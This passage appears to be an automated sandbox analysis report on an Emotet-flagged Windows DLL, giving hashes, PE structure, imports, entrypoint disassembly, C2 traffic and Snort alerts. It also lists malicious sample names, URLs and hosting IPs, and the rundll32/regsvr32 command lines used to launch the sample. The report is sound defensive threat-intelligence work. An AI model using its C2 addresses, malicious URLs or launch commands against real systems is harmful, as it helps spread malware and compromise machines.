	KKveTTgaAAsecNNaaaa.x86	Get hash	malicious	Browse	160.100.230.16
OVHFR	bscHLGMyjW.dll	Get hash	malicious	Browse	192.99.251.50
	9818t9ks1s.dll	Get hash	malicious	Browse	192.99.251.50
	uVPWqAOMKn.dll	Get hash	malicious	Browse	146.59.226.45
	CUfsVUDkr6.dll	Get hash	malicious	Browse	51.91.76.89
	psIFSn7VLi.dll	Get hash	malicious	Browse	192.99.251.50
	mtOre6QlR1.exe	Get hash	malicious	Browse	51.255.34.118
	LtVtlK0cd0.exe	Get hash	malicious	Browse	37.59.226.102
	VJjbjkQBMt_bin.js	Get hash	malicious	Browse	178.32.27.188
	https://awin1.com/cread.php?awinmid=12045&awinaffid=&ued=&clickref=td1_adid:TWSales&p=http%3A%2F%2Fnoxdirect.web.app%2Fkdix07xvardQ3bd0TR3wH05nZ1	Get hash	malicious	Browse	139.99.6.158
	DOC104.doc	Get hash	malicious	Browse	54.38.217.40
	fax10545.htm	Get hash	malicious	Browse	51.210.32.132
	JUSTIFICANTE DE PAGO.exe	Get hash	malicious	Browse	92.222.97.132
	Adventstiden.exe	Get hash	malicious	Browse	37.59.226.102
	what_is_in_a_supplier_agreement.js	Get hash	malicious	Browse	188.165.135.193
	SecuriteInfo.com.Variant.Doina.40672.15982.exe	Get hash	malicious	Browse	51.210.113.204
	Kalkene174.exe	Get hash	malicious	Browse	37.59.226.102
	H29Sj5e4FT.exe	Get hash	malicious	Browse	94.23.190.57
	axnCDWrZKu.exe	Get hash	malicious	Browse	94.23.190.57
	mM83aORZzI.exe	Get hash	malicious	Browse	94.23.190.57
	http://globall.be/cli/ms.html?email=test@tset.com	Get hash	malicious	Browse	213.186.33.104

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	Microsoft Cabinet archive data, 61712 bytes, 1 file
Category:	dropped
Size (bytes):	61712
Entropy (8bit):	7.995044632446497
Encrypted:	true
SSDEEP:	1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
MD5:	589C442FC7A0C70DCA927115A700D41E
SHA1:	66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
SHA-256:	2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
SHA-512:	1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
Malicious:	false
Preview:	MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&\|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y\|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..\|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\SysWOW64\regsvr32.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.127441018847852
Encrypted:	false
SSDEEP:	6:kKk1jku+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:puNkPlE99SNxAhUeE1
MD5:	AF04AB9D40C3B4C211623015BF58DC1B
SHA1:	4089F3384FE9EA0D5236768F1C80DC587BF583B0
SHA-256:	F17D96764E1BAFA37695F143754C0A075AFA0D4950E1DE7FDCB4B260AA47EFA3
SHA-512:	8594DD11B66BDFD68059329F9D453431F4F16EE70C44291CBC7A9463AE7095FDAFD889817556728EDFFA1598CE9D3C2107E31DF73AE541D784695D2D4A96F37D
Malicious:	false
Preview:	p...... .........KX.....(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...

Static File Info

General

File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.926205785552602
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	6xfFjxyRXf.dll
File size:	421888
MD5:	f63300c5bbb25b90839996a6d1b8daf3
SHA1:	663b6080201bb8258c3a17b552094ae25d0ae9eb
SHA256:	9ba940714eb15665a5e28c43c1e4d1dee3f086d76c197015e0aa4b40b809ded0
SHA512:	79c208f7bd35ee1d6d886184ff1985c78df7acd0282de544e21122ec00e7893bcf1fe6447838679809c7ef8a5da2ef4df4b8b8976db737b41e0cae691661c26d
SSDEEP:	12288:zwn2hR3547jpDMgySAxpuCMS5AhugWarPU:DRJ47xjyXpuCMSqumrP
TLSH:	7094CF0272D0C47AC6EF23785D239B5AA7F9FC208A75C647A751BF8D5E326C1893034A
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]...................................................,...................2...........j...........................Rich...........

File Icon


Icon Hash:	ccccccccd8d2dccc

Static PE Info

General

Entrypoint:	0x100118aa
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DLL
DLL Characteristics:
Time Stamp:	0x623F4EFA [Sat Mar 26 17:35:54 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	8f8b1cb86c6697dd342b65a36c6ccbb5

Entrypoint Preview

Instruction
push 0000000Ch
push 1002E838h
call 00007F2E98C687AFh
xor eax, eax
inc eax
mov dword ptr [ebp-1Ch], eax
mov esi, dword ptr [ebp+0Ch]
xor edi, edi
cmp esi, edi
jne 00007F2E98C6738Eh
cmp dword ptr [1003A15Ch], edi
je 00007F2E98C67439h
mov dword ptr [ebp-04h], edi
cmp esi, eax
je 00007F2E98C67387h
cmp esi, 02h
jne 00007F2E98C673B3h
mov eax, dword ptr [1003BA54h]
cmp eax, edi
je 00007F2E98C6738Eh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call eax
mov dword ptr [ebp-1Ch], eax
cmp dword ptr [ebp-1Ch], edi
je 00007F2E98C6740Bh
push dword ptr [ebp+10h]
push esi
push dword ptr [ebp+08h]
call 00007F2E98C671A7h
mov dword ptr [ebp-1Ch], eax
cmp eax, edi
je 00007F2E98C673F4h
mov ebx, dword ptr [ebp+10h]
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F2E98C5BA3Ah
mov dword ptr [ebp-1Ch], eax
cmp esi, 01h
jne 00007F2E98C67390h
cmp eax, edi
jne 00007F2E98C6738Ch
push ebx
push edi
push dword ptr [ebp+08h]
call 00007F2E98C6717Dh
cmp esi, edi
je 00007F2E98C67387h
cmp esi, 03h
jne 00007F2E98C673ABh
push ebx
push esi
push dword ptr [ebp+08h]
call 00007F2E98C6716Ah
test eax, eax
jne 00007F2E98C67385h
mov dword ptr [ebp-1Ch], edi
cmp dword ptr [ebp-1Ch], edi
je 00007F2E98C67395h
mov eax, dword ptr [1003BA54h]
cmp eax, edi
je 00007F2E98C6738Ch
push ebx
push esi
push dword ptr [ebp+08h]
call eax
mov dword ptr [ebp-1Ch], eax
or dword ptr [ebp-04h], FFFFFFFFh
mov eax, dword ptr [ebp-1Ch]
jmp 00007F2E98C6739Ch
mov eax, dword ptr [ebp-14h]
mov ecx, dword ptr [eax]

Rich Headers

Programming Language:

[ASM] VS2003 (.NET) build 3077
[ C ] VS2003 (.NET) build 3077
[C++] VS2003 (.NET) build 3077
[EXP] VS2003 (.NET) build 3077
[RES] VS2003 (.NET) build 3077
[LNK] VS2003 (.NET) build 3077

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x354d0	0x80	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x338dc	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3c000	0x24b90	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x61000	0x385c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x302d0	0x48	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b000	0x54c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x33854	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x29ffe	0x2a000	False	0.6064278738839286	COM executable for DOS	6.692976248573253	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2b000	0xa550	0xb000	False	0.3276589133522727	data	4.950983780735592	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x36000	0x5a58	0x3000	False	0.24137369791666666	data	3.613770783713054	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x3c000	0x24b90	0x25000	False	0.9165368982263513	data	7.7821351881075715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x61000	0x83bc	0x9000	False	0.2816840277777778	data	3.490541222086245	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
	0x3cf40	0x20800	data	English	United States
RT_CURSOR	0x5dd30	0x134	data	English	United States
RT_CURSOR	0x5de68	0xb4	data	English	United States
RT_CURSOR	0x5df48	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x5e098	0x134	data	English	United States
RT_CURSOR	0x5e1e8	0x134	data	English	United States
RT_CURSOR	0x5e338	0x134	data	English	United States
RT_CURSOR	0x5e488	0x134	data	English	United States
RT_CURSOR	0x5e5d8	0x134	data	English	United States
RT_CURSOR	0x5e728	0x134	data	English	United States
RT_CURSOR	0x5e878	0x134	data	English	United States
RT_CURSOR	0x5e9c8	0x134	data	English	United States
RT_CURSOR	0x5eb18	0x134	data	English	United States
RT_CURSOR	0x5ec68	0x134	AmigaOS bitmap font	English	United States
RT_CURSOR	0x5edb8	0x134	data	English	United States
RT_CURSOR	0x5ef08	0x134	data	English	United States
RT_CURSOR	0x5f058	0x134	data	English	United States
RT_BITMAP	0x5f290	0xb8	data	English	United States
RT_BITMAP	0x5f348	0x144	data	English	United States
RT_ICON	0x3cac0	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x5d740	0x264	data	English	United States
RT_DIALOG	0x5f1a8	0xe8	data	English	United States
RT_STRING	0x5f490	0x82	data	English	United States
RT_STRING	0x5f518	0x2a	data	English	United States
RT_STRING	0x5f548	0x192	data	English	United States
RT_STRING	0x5f6e0	0x4e2	data	English	United States
RT_STRING	0x5ff58	0x31a	data	English	United States
RT_STRING	0x5fc78	0x2dc	data	English	United States
RT_STRING	0x60ab8	0x8a	data	English	United States
RT_STRING	0x5fbc8	0xac	data	English	United States
RT_STRING	0x609a8	0xde	data	English	United States
RT_STRING	0x60278	0x4c4	data	English	United States
RT_STRING	0x60740	0x264	data	English	United States
RT_STRING	0x60a88	0x2c	data	English	United States
RT_STRING	0x60b48	0x42	data	English	United States
RT_GROUP_CURSOR	0x5df20	0x22	Lotus unknown worksheet or configuration, revision 0x2	English	United States
RT_GROUP_CURSOR	0x5e710	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5e080	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5e5c0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5e470	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5eda0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5e320	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5e9b0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5e1d0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5e860	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5eb00	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5ec50	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5eef0	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f040	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_CURSOR	0x5f190	0x14	Lotus unknown worksheet or configuration, revision 0x1	English	United States
RT_GROUP_ICON	0x3cf28	0x14	data	English	United States
RT_VERSION	0x5d9a8	0x388	data	English	United States

Imports

DLL	Import
KERNEL32.dll	RtlUnwind, HeapFree, HeapAlloc, VirtualProtect, VirtualAlloc, GetSystemInfo, VirtualQuery, GetCommandLineA, HeapReAlloc, HeapSize, LCMapStringA, LCMapStringW, HeapDestroy, HeapCreate, VirtualFree, IsBadWritePtr, SetHandleCount, GetStdHandle, GetFileType, GetStartupInfoA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, UnhandledExceptionFilter, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, SetUnhandledExceptionFilter, GetStringTypeA, GetStringTypeW, GetTimeZoneInformation, IsBadReadPtr, IsBadCodePtr, SetStdHandle, SetEnvironmentVariableA, GetTickCount, GetFileTime, GetFileAttributesA, FileTimeToLocalFileTime, FileTimeToSystemTime, GetOEMCP, GetCPInfo, CreateFileA, GetFullPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, TlsFree, LocalReAlloc, TlsSetValue, TlsAlloc, TlsGetValue, EnterCriticalSection, GlobalHandle, GlobalReAlloc, LeaveCriticalSection, LocalAlloc, DeleteCriticalSection, InitializeCriticalSection, RaiseException, GlobalFlags, InterlockedIncrement, WritePrivateProfileStringA, FormatMessageA, LocalFree, MulDiv, SetLastError, GlobalGetAtomNameA, GlobalFindAtomA, lstrcatA, lstrcmpW, lstrcpynA, InterlockedDecrement, GlobalUnlock, GlobalFree, FreeResource, GlobalAddAtomA, FindResourceA, LoadResource, LockResource, SizeofResource, GetCurrentThread, GetCurrentThreadId, GlobalLock, GlobalAlloc, FreeLibrary, GlobalDeleteAtom, lstrcmpA, GetModuleFileNameA, GetModuleHandleA, GetProcAddress, ConvertDefaultLocale, EnumResourceLanguagesA, lstrcpyA, LoadLibraryA, CompareStringW, CompareStringA, lstrlenA, lstrcmpiA, GetVersion, GetLastError, WideCharToMultiByte, MultiByteToWideChar, GetVersionExA, GetThreadLocale, GetLocaleInfoA, GetACP, InterlockedExchange, OpenProcess, TerminateProcess, Sleep, CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, FreeEnvironmentStringsA, ExitProcess
USER32.dll	RegisterClipboardFormatA, PostThreadMessageA, MessageBeep, GetNextDlgGroupItem, InvalidateRgn, InvalidateRect, CopyAcceleratorTableA, SetRect, IsRectEmpty, CharNextA, GetSysColorBrush, ReleaseCapture, LoadCursorA, SetCapture, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, wsprintfA, MoveWindow, SetWindowTextA, IsDialogMessageA, RegisterWindowMessageA, WinHelpA, GetCapture, CreateWindowExA, GetClassLongA, GetClassInfoExA, SetPropA, GetPropA, RemovePropA, SendDlgItemMessageA, SetFocus, IsChild, GetForegroundWindow, GetTopWindow, GetMessagePos, MapWindowPoints, SetForegroundWindow, UpdateWindow, GetMenu, GetSubMenu, GetMenuItemID, GetMenuItemCount, GetSysColor, AdjustWindowRectEx, EqualRect, GetClassInfoA, RegisterClassA, UnregisterClassA, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, SetWindowLongA, OffsetRect, DrawIcon, SendMessageA, IsIconic, GetClientRect, EnableWindow, LoadIconA, GetSystemMetrics, GetWindowTextLengthA, IsWindowVisible, GetWindowRect, GetWindowTextA, GetClassNameA, EnumWindows, IntersectRect, SystemParametersInfoA, GetWindowPlacement, PtInRect, UnhookWindowsHookEx, GetWindow, SetWindowContextHelpId, MapDialogRect, SetWindowPos, ReleaseDC, GetDC, CopyRect, GetDesktopWindow, SetActiveWindow, CreateDialogIndirectParamA, DestroyWindow, IsWindow, GetDlgItem, GetNextDlgTabItem, EndDialog, SetMenuItemBitmaps, GetFocus, ModifyMenuA, GetMenuState, EnableMenuItem, GetMessageTime, DestroyMenu, ShowWindow, PostMessageA, CharUpperA, PostQuitMessage, SetCursor, IsWindowEnabled, GetLastActivePopup, GetWindowLongA, GetParent, MessageBoxA, ValidateRect, GetCursorPos, PeekMessageA, GetKeyState, GetActiveWindow, DispatchMessageA, TranslateMessage, GetMessageA, CallNextHookEx, SetWindowsHookExA, LoadBitmapA, GetMenuCheckMarkDimensions, CheckMenuItem
GDI32.dll	GetMapMode, GetTextColor, GetRgnBox, GetDeviceCaps, GetStockObject, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, GetBkColor, CreateBitmap, Escape, ExtTextOutA, TextOutA, RectVisible, PtVisible, GetWindowExtEx, GetViewportExtEx, DeleteObject, SetMapMode, RestoreDC, SaveDC, GetObjectA, SetBkColor, SetTextColor, GetClipBox, CreateRectRgnIndirect, SelectObject
comdlg32.dll	GetFileTitleA
WINSPOOL.DRV	OpenPrinterA, DocumentPropertiesA, ClosePrinter
ADVAPI32.dll	RegQueryValueExA, RegOpenKeyExA, RegDeleteKeyA, RegEnumKeyA, RegOpenKeyA, RegQueryValueA, RegCreateKeyExA, RegSetValueExA, RegCloseKey
COMCTL32.dll	ImageList_Destroy
SHLWAPI.dll	PathFindFileNameA, PathStripToRootA, PathFindExtensionA, PathIsUNCA
oledlg.dll
ole32.dll	CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, CLSIDFromProgID, OleUninitialize, CoFreeUnusedLibraries, CoRegisterMessageFilter, OleFlushClipboard, OleIsCurrentClipboard, CoRevokeClassObject, OleInitialize
OLEAUT32.dll	SysFreeString, SysAllocStringLen, VariantClear, VariantChangeType, VariantInit, SysStringLen, SysAllocStringByteLen, OleCreateFontIndirect, SystemTimeToVariantTime, SafeArrayDestroy, SysAllocString, VariantCopy

Exports

Name	Ordinal	Address
DllRegisterServer	1	0x100048a0
DllUnregisterServerrrrrrrrrrrr	2	0x100048d0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.6119.193.124.414985970802404304 07/20/22-01:13:31.686515	TCP	2404304	ET CNC Feodo Tracker Reported CnC Server TCP group 3	49859	7080	192.168.2.6	119.193.124.41
192.168.2.651.91.76.894984480802404338 07/20/22-01:13:29.114997	TCP	2404338	ET CNC Feodo Tracker Reported CnC Server TCP group 20	49844	8080	192.168.2.6	51.91.76.89

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jul 20, 2022 01:12:37.545278072 CEST	49773	8080	192.168.2.6	216.120.236.62
Jul 20, 2022 01:12:40.626862049 CEST	49773	8080	192.168.2.6	216.120.236.62
Jul 20, 2022 01:12:46.650408030 CEST	49773	8080	192.168.2.6	216.120.236.62
Jul 20, 2022 01:12:58.788846016 CEST	49803	443	192.168.2.6	189.232.46.161
Jul 20, 2022 01:12:58.788919926 CEST	443	49803	189.232.46.161	192.168.2.6
Jul 20, 2022 01:12:58.789094925 CEST	49803	443	192.168.2.6	189.232.46.161
Jul 20, 2022 01:12:58.832343102 CEST	49803	443	192.168.2.6	189.232.46.161
Jul 20, 2022 01:12:58.832392931 CEST	443	49803	189.232.46.161	192.168.2.6
Jul 20, 2022 01:13:29.083200932 CEST	49803	443	192.168.2.6	189.232.46.161
Jul 20, 2022 01:13:29.114996910 CEST	49844	8080	192.168.2.6	51.91.76.89
Jul 20, 2022 01:13:29.136509895 CEST	8080	49844	51.91.76.89	192.168.2.6
Jul 20, 2022 01:13:29.722778082 CEST	49844	8080	192.168.2.6	51.91.76.89
Jul 20, 2022 01:13:29.745616913 CEST	8080	49844	51.91.76.89	192.168.2.6
Jul 20, 2022 01:13:30.323734999 CEST	49844	8080	192.168.2.6	51.91.76.89
Jul 20, 2022 01:13:30.349111080 CEST	8080	49844	51.91.76.89	192.168.2.6
Jul 20, 2022 01:13:30.386081934 CEST	49855	8080	192.168.2.6	217.182.25.250
Jul 20, 2022 01:13:30.417004108 CEST	8080	49855	217.182.25.250	192.168.2.6
Jul 20, 2022 01:13:30.952959061 CEST	49855	8080	192.168.2.6	217.182.25.250
Jul 20, 2022 01:13:30.982132912 CEST	8080	49855	217.182.25.250	192.168.2.6
Jul 20, 2022 01:13:31.526103020 CEST	49855	8080	192.168.2.6	217.182.25.250
Jul 20, 2022 01:13:31.560188055 CEST	8080	49855	217.182.25.250	192.168.2.6
Jul 20, 2022 01:13:31.686515093 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:13:31.950680971 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:31.955549002 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:13:31.956378937 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:13:32.217185974 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:32.231532097 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:32.231570959 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:32.243074894 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:13:37.208336115 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:13:37.470942020 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:37.474697113 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:13:37.478393078 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:13:37.783706903 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:38.629363060 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:38.629446983 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:13:41.630054951 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:41.630089045 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:13:41.630225897 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:14:27.472696066 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:14:27.472757101 CEST	49859	7080	192.168.2.6	119.193.124.41
Jul 20, 2022 01:14:27.734839916 CEST	7080	49859	119.193.124.41	192.168.2.6
Jul 20, 2022 01:14:27.735079050 CEST	49859	7080	192.168.2.6	119.193.124.41

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jul 20, 2022 01:12:48.819976091 CEST	8.8.8.8	192.168.2.6	0xdbb6	No error (0)	au.c-0001.c-msedge.net	c-0001.c-msedge.net		CNAME (Canonical name)	IN (0x0001)
Jul 20, 2022 01:12:48.819976091 CEST	8.8.8.8	192.168.2.6	0xdbb6	No error (0)	c-0001.c-msedge.net		13.107.4.50	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exePID: 6908, Parent PID: 792

General

Target ID:	0
Start time:	01:12:04
Start date:	20/07/2022
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll"
Imagebase:	0x70000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 6916, Parent PID: 6908

General

Target ID:	1
Start time:	01:12:05
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1
Imagebase:	0xed0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: regsvr32.exePID: 6932, Parent PID: 6908

General

Target ID:	2
Start time:	01:12:06
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	regsvr32.exe /s C:\Users\user\Desktop\6xfFjxyRXf.dll
Imagebase:	0x1d0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000002.00000002.414918130.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.414918130.0000000004F00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 6944, Parent PID: 6916

General

Target ID:	3
Start time:	01:12:06
Start date:	20/07/2022
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\6xfFjxyRXf.dll",#1
Imagebase:	0x1210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
